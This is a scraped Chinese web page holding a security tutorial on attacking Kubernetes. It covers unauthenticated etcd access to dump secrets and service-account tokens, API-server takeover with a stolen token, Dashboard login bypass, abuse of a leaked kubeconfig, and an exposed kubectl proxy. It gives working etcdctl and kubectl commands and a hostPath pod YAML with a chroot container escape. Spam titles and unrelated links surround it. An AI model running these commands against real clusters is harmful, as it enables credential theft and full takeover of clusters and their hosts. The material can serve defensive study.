当前位置: 首页 > news >正文

家政网站模板民宿网站开发的开题报告

家政网站模板,民宿网站开发的开题报告,免费字体设计 常见网站,贵州安顺建设主管部门网站目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点#xff1a; 1、云原生-K8s安全-etcd未…目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点 1、云原生-K8s安全-etcd未授权访问 2、云原生-K8s安全-Dashboard未授权访问 3、云原生-K8s安全-Configfile鉴权文件泄漏 4、云原生-K8s安全-Kubectl Proxy不安全配置 云原生-K8s安全-etcd(Master-数据库)未授权访问 实战中不会常见利用条件比较苛刻。 默认通过证书认证起一个数据库作用。主要存放节点的数据如一些token和证书。 攻击23791端口 配置映射 /etc/kubernetes/manifests/etcd.yaml第一种(满足)在安装etcd时没有配置指定--client-cert-auth 参数打开证书校验暴露在外Etcd服务存在未授权访问风险。暴露外部可以访问直接未授权访问获取secrets和token利用 重启kubelet进程 systemctl restart kubelet第二种在打开证书校验选项后通过本地127.0.0.1:2379可免认证访问Etcd服务但通过其他地址访问要携带cert(证书)进行认证访问一般配合ssrf或其他利用较为鸡肋。只能本地访问直接未授权访问获取secrets和token利用 第三种(满足)实战中在安装k8s默认的配置2379只会监听本地(127.0.0.1)如果访问没设置0.0.0.0暴露那么也就意味着最多就是本地访问不能公网访问只能配合ssrf或其他。只能本地访问利用ssrf或其他进行获取secrets和token利用 复现搭建 https://www.cnblogs.com/qtzd/p/k8s_etcd.html 复现利用etcdV2/V3版本利用参考 https://www.cnblogs.com/qtzd/p/k8s_etcd.html https://www.wangan.com/p/7fy7f81f02d9563a 暴露etcd未授权-获取secretstoken-通过token访问API-Server接管 etcdV2版本利用 直接访问http://ip:2379/v2/keys/?recursivetrue 可以看到所有的key-value值。secrets token etcdV3版本利用 安装etcdctlhttps://github.com/etcd-io/etcd/releases 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 1、连接提交测试 ./etcdctl --endpoints192.168.139.136:23791 get / --prefix./etcdctl --endpoints192.168.139.136:23791 put /testdir/testkey1 Hello world1./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey2 Hello world2 ./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey3 Hello world32、获取k8s的secrets ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/3、读取service account token ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole./etcdctl --endpoints192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z4、通过token访问API-Server获取集群的权限 kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --tokeney... -n kube-system get podsSSRF解决限制访问-获取secretstoken-通过token访问API-Server接管 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 默认端口8001(一般会被映射成别的端口) 配置不当导致dashboard未授权访问,通过dashboard我们可以控制整个集群。 kubernetes dashboard的未授权其实分两种情况 一种是在本身就存在着不需要登录的http接口但接口本身并不会暴露出来如接口被暴露在外就会导致dashboard未授权。另外一种情况则是开发嫌登录麻烦修改了配置文件使得安全接口https的dashboard页面可以跳过登录。 复现利用 前提条件 用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboardKubernetes-dashboard绑定cluster-admin拥有管理集群的最高权限) 1、安装 https://blog.csdn.net/justlpf/article/details/130718774 2、启动 kubectl create -f recommended.yaml 3、卸载 kubectl delete -f recommended.yaml4、查看状态 kubectl get pod,svc -n kubernetes-dashboard5、利用新增Pod后续同前面利用一致 apiVersion: v1 kind: Pod metadata:name: xiaodisec spec:containers:- image: nginxname: xiaodisecvolumeMounts:- mountPath: /mntname: test-volumevolumes:- name: test-volumehostPath:path: /找到暴露面板-dashboard跳过-创建或上传pod-进入pod执行-利用挂载逃逸   云原生-K8s安全-Configfile鉴权文件泄漏 攻击者通过Webshell、Github等拿到了K8s配置的Config文件操作集群从而接管所有容器。 K8s configfile作为K8s集群的管理凭证其中包含有关K8s集群的详细信息(API Server、登录凭证)。 如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等)就可以直接通过API Server接管K8s集群带来风险隐患。用户凭证保存 在kubeconfig文件中通过以下顺序来找到kubeconfig文件 如果提供了--kubeconfig参数就使用提供的kubeconfig文件如果没有提供--kubeconfig参数但设置了环境变量$KUBECONFIG则使用该环境变量提供的kubeconfig文件如果以上两种情况都没有kubectl就使用默认的kubeconfig文件~/.kube/config 复现利用K8s-configfile-创建Pod/挂载主机路径-Kubectl进入容器-利用挂载逃逸 1、将获取到的config复制 2、安装kubectl使用config连接 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 连接 kubectl -s https://192.168.139.130:6443/ --kubeconfigconfig --insecure-skip-tls-verifytrue get nodes3、上传利用test.yaml创建pod kubectl apply -f test.yaml -n default --kubeconfigconfig4、连接pod后进行容器挂载逃逸 kubectl exec -it xiaodisec bash -n default --kubeconfigconfigcd /mnt chroot . bash云原生-K8s安全-Kubectl Proxy不安全配置 当运维人员需要某个环境暴露端口或者IP时会用到Kubectl Proxy 使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上 环境搭建 kubectl --insecure-skip-tls-verify proxy --accept-hosts^.*$ --address0.0.0.0 --port8009 复现利用类似某个不需认证的服务应用只能本地访问被代理出去后形成了外部攻击入口点。 找到暴露入口点根据类型选择合适方案 kubectl -s http://192.168.139.130:8009 get pods -n kube-system
http://www.zqtcl.cn/news/85034/

相关文章:

  • 成都金融网站建设公司排名wordpress调用个人中心
  • 东莞 营销网站制作想做个外贸网站
  • 常宁做网站哪家建站公司好
  • php 企业网站管理系统深圳有哪几个区
  • 网站怎么做外链接四川住房和城乡建设部网站首页
  • 济源网站建设公司北京邢台企业商会网站
  • wordpress网站排名台州商城网站建设
  • 做旅游网站的写手网站举报在哪举报
  • 遵义公司网站搭建多少钱上海移动云网站建设
  • 北京网站建设付款方式个人网站设计结构图
  • 网站公司seo微信后台网站建设
  • 唐山网站专业制作上海模板建站源码
  • 杭州网站建设乐云seo模板中心织梦网站模板视频教程
  • 那里有学做网站的中专网站建设与管理就业前景
  • 北京网站开发工程师珠宝 网站欣赏
  • 台州做网站哪家公司好做app网站
  • 英文网站建设免费dwcc网站前台脚本怎么做音频
  • 做网站 租服务器吗单页推广网站模版
  • 铁岭 建筑公司网站 中企动力建设网站推广方案注意事项
  • 科技网站建设的调研杭州 城西 做网站
  • 单页网站 html哈尔滨做网站的
  • 华为手机网站建设策划方案论文苏州工业园区有哪些企业
  • 中国风网站建设长春网站网站建设
  • 手机vi设计公司网站优化顺义案例
  • 贸易公司网站建设要多少钱正邦集团招聘
  • 深圳平价的专业建站公司中国建设银行手机版网站首页
  • 财务网站模板wordpress最新版新建页面选择模板
  • 成都网站建设联系方式做网站 信科网络
  • 触摸屏网站如何做福田招聘信息
  • 企业网站建设选题依据网站登录模板